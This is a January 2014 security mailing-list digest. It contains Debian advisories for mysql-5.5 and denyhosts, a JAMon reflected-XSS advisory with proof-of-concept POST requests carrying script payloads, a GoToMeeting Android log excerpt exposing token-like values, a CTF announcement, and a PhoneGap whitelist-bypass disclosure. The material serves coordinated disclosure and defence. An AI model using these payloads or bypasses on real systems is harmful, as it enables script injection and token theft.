[SECURITY] [DSA 2848-1] mysql-5.5 security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2848-1 secur...@debian.org http://www.debian.org/security/ Salvatore Bonaccorso January 23, 2014 http://www.debian.org/security/faq - - Package: mysql-5.5 Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-5891 CVE-2013-5908 CVE-2014-0386 CVE-2014-0393 CVE-2014-0401 CVE-2014-0402 CVE-2014-0412 CVE-2014-0420 CVE-2014-0437 Several issues have been discovered in the MySQL database server. The vulnerabilities are addressed by upgrading MySQL to the new upstream version 5.5.35. Please see the MySQL 5.5 Release Notes and Oracle's Critical Patch Update advisory for further details: http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-34.html http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-35.html http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html For the stable distribution (wheezy), these problems have been fixed in version 5.5.35+dfsg-0+wheezy1. For the unstable distribution (sid), these problems have been fixed in version 5.5.35+dfsg-1. We recommend that you upgrade your mysql-5.5 packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBCgAGBQJS4Tb/AAoJEAVMuPMTQ89ET1kP/1XFwa9nlAU1CUOVZc5kBuAV EgQVQRKpfclCqZ1nKpxb5oNlEkU8EyT1JRmQ0bK9Hwqt61hBIbt5S3aKnvWyA+oC dGIKBeaLbhbRcPGUiDbF2eSiqh+f+QNAypoc5cDDlcQBXPA667KNeP3on0ZUts/m RY7dzJmrh013TDdhaKvUxq86lOZgUxwvWAtjJjnEzKMPSM9d3nueVtKwge/H4YJh KULTysQa5MAAQmKQ03mkbKRbBZ3UKo74xwgGeKctFLsysKeivY/WQSFPBexnwBx+ ZbU1XK3t5zfVyWLkSzL5aqKchFWxmTGnMSdEnRmz/zotiSeLTsT8KErdtREbu5zP 3Ixe9PtpgLoJ6QRDiJUVNrZTnSJ2GOmDHMAtWUhqLYzGjKviM1JiqdVusOpzvODI Go8XApADvUG5JrPO1oZR+1CfcX3RaYWJDJQbwJ7s9uU9ATIc+y5HWUkGGRES8CBG iMUJDe3Wwxic/wS2r/SJkBlhINHy7CrOzGic+blF3+qXcH4R5qcCcfGmQ/EmKpqo nC2mfqCIu7mnQq7VrmGbEJOdohm4g43iQz8Dwckl9aTYuu+vG2UzTYRKUhx+jLhZ e4PGso/Sm5X4nMgqo8GEEqhO3z4VrtWrsH0NewSrfn8XYz9hyMd1cQgVjV4H0M7u iWdDB6CHFSSuL7O919Pd =AfR1 -END PGP SIGNATURE-
[CVE-2013-6235] - Multiple Reflected XSS vulnerabilities in JAMon v2.7
###
01. ### Advisory Information ###
Title: Multiple Reflected XSS vulnerabilities in JAMon
Date published: 2013-01-23
Date of last update: 2013-01-23
Vendors contacted: JAMon v 2.7
Discovered by: Christian Catalano
Severity: Low
02. ### Vulnerability Information ###
CVE reference: CVE-2013-6235
CVSS v2 Base Score: 4.3
CVSS v2 Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Component/s: JAMon v 2.7
Class: Input Manipulation
03. ### Introduction ###
The Java Application Monitor (JAMon) is a free, simple, high
performance, thread safe, Java API that allows developers to easily
monitor production applications.
http://jamonapi.sourceforge.net
04. ### Vulnerability Description ###
Multiple Non-Persistent Cross-Site Scripting vulnerabilities have been
identified in the JAMon web application.
JAMon contains a flaw that allows multiple reflected cross-site
scripting (XSS) attacks.
This flaw exists because certain pages do not validate input before
returning it to users.
+--+---+
|-Vulnerable module(s)andparameter(s)--|
+--+---+
|mondetail.jsp ArraySQL|
|mondetail.jsp listenertype|
|mondetail.jsp currentlistener-|
|jamonadmin.jsp ---ArraySQL|
|sql.jsp---ArraySQL|
|exceptions.jspArraySQL|
+--+---+
05. ### Technical Description / Proof of Concept Code ###
05.01) Malicious Request (ArraySQL parameter):
The vulnerability is located in the ' Filter (optional) ' input field
upon submission to the pages
http://localhost/jamon/mondetail.jsp
http://localhost/jamon/ jamonadmin.jsp
http://localhost/jamon/ sql.jsp
http://localhost/jamon/ exceptions.jsp
The application does not validate the 'ArraySQL' parameter upon
submission to the *.jsp scripts.
The attacker can inject the malicious javascript code:
1--1ScRiPt alert('XSS')/ScRiPt!--
in the ' Filter (optional) ' input field and click on GO! button.
05.02) Malicious Request (listenertype parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
listenertype=1--1ScRiPtalert('XSS')/ScRiPt!--currentlistener=JAMonBufferListeneroutputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21
05.03) Malicious Request (currentlistener parameter)
POST /jamon/mondetail.jsp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101
Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jamon/mondetail.jsp
Cookie: JSESSIONID=3EFF8AFB46683B03B2CD73663A97FFDD.jboss1; ROUTEID=.jboss1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
listenertype=valuecurrentlistener=1--1ScRiPtalert('XSS')/ScRiPt!--outputTypeValue=htmlformatterValue=%23%2C%23%23%23bufferSize=No+ActionTextSize=highlight=ArraySQL=actionSbmt=Go+%21
06. ### Business Impact ###
This may allow an attacker to create a specially crafted request that
would execute arbitrary script code in a user's browser within the trust
relationship between their browser and the server.
07. ### Systems Affected ###
This vulnerability was tested against: JAMon v2.7
Older versions are probably affected too, but they were not checked.
08. ### Vendor Information, Solutions and Workarounds ###
Currently, there are no known upgrades or patches to correct this
vulnerability.
09. ### Credits ###
This vulnerability has been discovered by:
Christian Catalano aka wastasy ch(dot)catalano(at)gmail(dot)com
10. ### Vulnerability History ###
October 18th, 2013: Vulnerability identification
October 22th, 2013: Vendor notification [JAMon]
December 10th, 2013: Vulnerability confirmation [JAMonI]
January 23th, 2014: Vulnerability disclosure
11. ### Disclaimer ###
The information contained within this advisory is supplied as-is with
no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of
this information.
###
[SECURITY] [DSA 2826-2] denyhosts regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2826-2 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez January 23, 2014 http://www.debian.org/security/faq - - Package: denyhosts Vulnerability : regression Debian Bug : 734329 CVE ID : CVE-2013-6890 A regression has been found on the denyhosts packages fixing CVE-2013-6890. This regression could cause an attempted breakin attempt to be missed by denyhosts, which would then fail to enforce a ban. For the oldstable distribution (squeeze), this problem has been fixed in version 2.6-7+deb6u3. For the stable distribution (wheezy), this problem has been fixed in version 2.6-10+deb7u3. For the testing (jessie) and unstable (sid) distribution, the package denyhosts has been removed, and its users are encouraged to switch to an alternative like fail2ban. We recommend that you upgrade your denyhosts packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.22 (GNU/Linux) iQF8BAEBCgBmBQJS4ZGvXxSAAC4AKGlzc3Vlci1mcHJAbm90YXRpb25zLm9w ZW5wZ3AuZmlmdGhob3JzZW1hbi5uZXQ5NzQ1QjAyMjczMjM4MUZFOUU3RUFGRjU2 RERCNTNGMkE2NzVDMEE1AAoJEG3bU/KmdcClexkH/1iQEL46p01Ckgz7hUySWgnZ ioiZCbrLFRKCYyS04Z0PNb0C4aAWLoFXtzUxU372KUTLhJQFrsTdI58j+eanD4+x PXEPpk0o+4ZO4eFcQSd0kKfXmOdZlgrc4q541hv5xIgPf9rdIkP5YQwcyk1lxXMs 7DvwPhsaWr+NpqyC4AeAlFMTbq7Wi0LZ8FQb7JJIrFP2dJ1BHRcyoi4EYjzhUcNA aI8nedfJqf2TLYBlZauBuIFXqHqmQp78Rf1+geJfpX64OebMb9iufSgVoU79Rbgi u3AS1/ynpN/2X9t3jCBjhZkY5BSMB8/EtheRNeYRLXLLoxmNudm2vzV1jOYLngM= =sZxV -END PGP SIGNATURE-
[CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output (Android)
1. ADVISORY INFORMATION
Title: GoToMeeting Information Disclosure via Logging Output (Android)
CVE: CVE-2014-1664
CVE Information: ASSIGNED
Date published: PUBLIC
Date of last update: 01/23/2014
Vendor Contacted: Citrix
Release mode: Coordinated Release
2. VULNERABILITY INFORMATION
=
Class: Information Disclosure
Impact: CVSS Details specified below
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: [CVE-2014-1664] GoToMeeting Information Disclosure via Logging Output
(Android)
3. VULNERABILITY DESCRIPTION
The latest release of the software is vulnerable to information disclosure via
logging output, resulting in the leak of userID, meeting details, and
authentication tokens. Android applications with permissions to read system log
files may obtain the leaked information.
4. VULNERABLE PACKAGES
==
- com.citrixonline.android.gotomeeting-1.apk version 5.0.799.1238 (Android)
5. NON-VULNERABLE PACKAGES
==
- other platforms untested
6. CREDITS
===
This vulnerability was discovered and researched by Claudio J. Lacayo.
7. TECHNICAL DESCRIPTION / PROOF OF CONCEPT CODE
=
! - SNIPPET --- !
D/G2M (32190): HttpRequest to:
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
E/qcom_sensors_hal( 787): hal_process_report_ind: Bad item quality: 11
D/dalvikvm(32190): GC_CONCURRENT freed 1322K, 43% free 20491K/35456K, paused
6ms+1ms, total 33ms
D/G2M (32190): HttpRequest response from: GET
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
- 200
D/G2M (32190): HttpRequest response body: GET
https://www2.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]
-
{Status:Redirect,RedirectHost:www1.gotomeeting.com,MeetingId:[MEETING_ID_REDACTED]}
D/G2M (32190): Got 302 from legacy JSON API: www1.gotomeeting.com
D/G2M (32190): HttpRequest to:
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
D/G2M (32190): HttpRequest response from: GET
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
- 200
D/G2M (32190): HttpRequest response body: GET
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]
-
{Status:MeetingNotStarted,MeetingId:[MEETING_ID_REDACTED],IsRecurring:false,Endpoints:[Native],OrganizerName:[REDACTED],Subject:[REDACTED],MaxAttendees:100,IsWebinar:false,AudioParameters:{CommParams:{disableUdp:false},ConferenceParams:{supportedModes:VoIP,PSTN,Private,initialMode:Hybrid,SpeakerInfo:{PhoneInfo:[{description:Default,number:[REDACTED],authToken:AAFe4rYexu4Dm7qrL45/Egx+AFLdeSkAUt7KqUbWYmXH3OcczkhGaWRf0wM2OKWa,accessCode:REDACTED},userId:userId,authToken:EAEBAQEBAQEBAQEBAQEBAQE=,privateMessage:,audioKey:-1,BridgeMutingControl:true,VCBParams:{Codec:[{payloadType:103,frameLength:30,name:ISAC,bitrate:32000,channels:1,samplingRate:16000},{payloadType:0,frameLength:20,name:PCMU,bitrate:64000,ch
annels:1,samplingRate:8000}],VCB:{port:5060,ipAddr:10.23.70.151},Options:{asUpdates:true,rtUpdates:true,dtx:false,EndTime:139023990,StartTime:139023720,IsImpromptu:false}
D/G2M (32190): Got response from legacy JSON API: 200
D/G2M (32190): JoinService: Attempting to join Meeting
D/G2M (32190): MeetingService: Starting Meeting join on legacy...
D/G2M (32190): HttpRequest to:
https://www.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?android=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
D/G2M (32190): ServiceResolver: COLService: BaseURL
[https://www1.gotomeeting.com], isLegacy [true}, isWebinar [false]
D/G2M (32190): HttpRequest response from: GET
https://www1.gotomeeting.com/meeting/getInfo/[MEETING_ID_REDACTED]?Portal=www.gotomeeting.comandroid=trueMeetingID=[MEETING_ID_REDACTED]PhoneInfo=,MachineID=WFNUUVtWBVRUVwRQAwUCAA==,G2MAppVersion=5.0.799.1238,BuildType=releaseBuild,Brand=google,Manufacturer=LGE,Model=Nexus5,AndroidVersionRelease=4.4.2,AndroidVersionIncremental=937116,ID=KOT49H,Product=hammerhead,Device=hammerhead,CpuABI=armeabi-v7a
- 302
D/G2M (32190): HttpRequest response body: GET
[CTF] nullcon HackIM 2014 will start at 24-01-2014, when the clock will strike at 11:59 (+5:30 GMT)
· This is blasphemy! This is madness! · Madness? THIS IS HACKIM! · H4x0rs! Ready your breakfast and eat hearty, for tonight, we dine in hell! · No retreat, no surrender. That is H4x0r law. And by H4x0r law, we will stand and fight.. and conquer. n00bs haXors, We are proud to present the sixth edition of HackIM 2014 (http://ctf.nullcon.net) HackIM CTF will starts on 24th Jan 2014 11:59 PM and will last till 26th Jan 2014 11:59 PM (GMT +5.30). We've got se7en categories (Total of whopping 35+ levels!) - Trivia - Crypto - Programming - Web - Reverse Engineering - Exploitation - Forensics Winner gets a free VIP Pass for nullcon Goa 2014 (http://www.nullcon.net). If you've already bought the pass we'll reimburse it. Winner and Top 8 Runner up will get chance to participate in nullcon JailBreak along with 4 nights stay at nullcon JAIL and FREE VIP pass for nullcon, if they choose to participate at nullcon JailBreak challenge. In JailBreak, participants will have to stay under house arrest (12th-13th Feb 2014). JailBreak participants can stay on same venue till 15th of Feb. (even after JailBreak) The unofficial back channel for the CTF is at irc.freenode.net #null0x00 Good luck and have fun :) Special Thanks to the volunteers and supporters without whom this would not have been possible. http://ctf.nullcon.net/madprops.php Cheers nullcon Team http://nullcon.net -- ___ nullcon goa V - spread love... not malware... 12-15th Feb 2014
Security Vulnerabilities in Apache Cordova / PhoneGap
The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and
again on 1/17/2014.
As there has been no response, we are re-posting it here to alert the general
public
of the inherent vulnerabilities in Apache Cordova/PhoneGap.
##
Dear PhoneGap contributors,
PhoneGaps domain whitelisting for accessing native resources is
broken and can be bypassed. These vulnerabilities can be exploited by
any third-party domain loaded inside an iframe (e.g., malicious ad
scripts). Below, we give a brief summary of the vulnerabilities. You
can find more details in the paper
http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.
1. Domain whitelisting on Android (before API 11) and Windows Phone 7
and 8 relies on the URL interception call that does not intercept
iframe and XMLHttpRequest URLs. Consequently, it does not restrict
which domains can be loaded in iframes. Any script inside an iframe
can directly use PhoneGaps internal JavaScript interfaces to the Java
objects and access native resources: for example, by calling execute =
cordova.require('cordova/exec'); var opts = cordova.require
('cordova/plugin/ ContactFindOptions' ); and directly operating on
these objects.
2. A malicious script running in an iframe can dynamically choose any
of PhoneGaps vulnerable bridge mechanisms at runtime (e.g.
addJavascriptInterface or loadUrl on Android) and use it to bypass the
domain whitelist. We call this the chosen-bridge attack.
3. PhoneGaps whitelisting check on Android is incorrect - it misses
an anchor at the end of the regular expression:
this.whiteList.add(Pattern.compile(https?://(.*\\.)? + origin));
For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.
4. PhoneGaps domain whitelisting on Android (API 11 or highler) and
iOS does not adhere to the same-origin policy. Third-party scripts
included using script tags are blocked unless their source domain is
whitelisted, even though these scripts execute in the origin of the
hosting page, not their source origin.
5. Instead of just blocking access to bridges from non-whitelisted
domains, PhoneGap completely blocks these domains from being loaded in
the browser. This prevents ad-supported apps from displaying
third-party ads and destroys the look-and-feel of many Web pages.
We have a proof-of-concept implementation (a 400-line patch for
PhoneGap 2.9.0 on Android) called NoFrak
[https://github.com/georgiev-martin/NoFrak] which fixes these
vulnerabilities. NoFrak does not allow Web content from
non-whitelisted domains to access native resources but still displays
it correctly in the browser. If you are interested in discussing how
to merge NoFrak or some parts of NoFrak to PhoneGaps main branch,
please let us know.
Thanks,
Martin, Suman, and Vitaly
##
